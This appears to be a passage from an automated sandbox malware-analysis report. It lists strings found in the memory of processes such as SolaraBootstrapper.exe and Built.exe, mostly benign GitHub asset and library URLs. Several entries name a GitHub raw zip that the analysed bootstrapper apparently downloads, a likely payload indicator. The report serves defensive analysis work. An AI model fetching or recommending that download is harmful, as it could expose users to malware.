                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/packages
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/features/security
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/fluidicon.png
                        Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041700632.000001D5E4868000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip&quot;
                        Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipd
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/readme
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/ci-cd
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devops
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/devsecops
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/financial-services
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/healthcare
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/solutions/industries/manufacturing
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/team
                        Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/topics
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/trending
                        Source: Built.exe, 00000003.00000002.2053069084.000001D5E5520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                        Source: Built.exe, 00000003.00000003.1829183709.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1856705420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2046197420.000001D5E525A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: Built.exe, 00000003.00000002.2054089602.000001D5E5720000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_as
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_m
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_g
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_onfocus_ts-ui_packages_trusted-type
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-78ce1c87
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/behaviors-eea438ad0058.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark-6b1e37da2254.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_colorblind-a4629b2e906b.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_high_contrast-f4daad25d8cf.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/element-registry-d3ba3606e12c.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/environment-bcaf5ff1a8f7.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/error-add24e2c1056.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-a1c8541470fb.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-elements-7505bd7456d8.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-logo-55c5b9a1fe52.png
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-mark-57519b92ca4e.png
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/github-octocat-13c86b8b336d.png
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/global-9e9ac94b9f81.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/keyboard-shortcuts-dialog-12eb51662ed7.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light-efd2f2257c96.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_colorblind-afcc3a6a38dd.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_high_contrast-79bca7145393.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/light_tritanopia-fe4137b54b26.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/mona-sans-d1bf285e9b9b.woff2
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/notifications-global-957ece5a6535.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/pinned-octocat-093da3e6fa40.svg
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-38e58d71ea15.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/primer-primitives-8500c2c7ce5f.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/react-lib-7b7b5264f6c1.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/sessions-4426dd0b720e.js
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/site-73c81d16a7dd.css
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-cd36524126
                        Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.githubassets.com/assets/vendors-
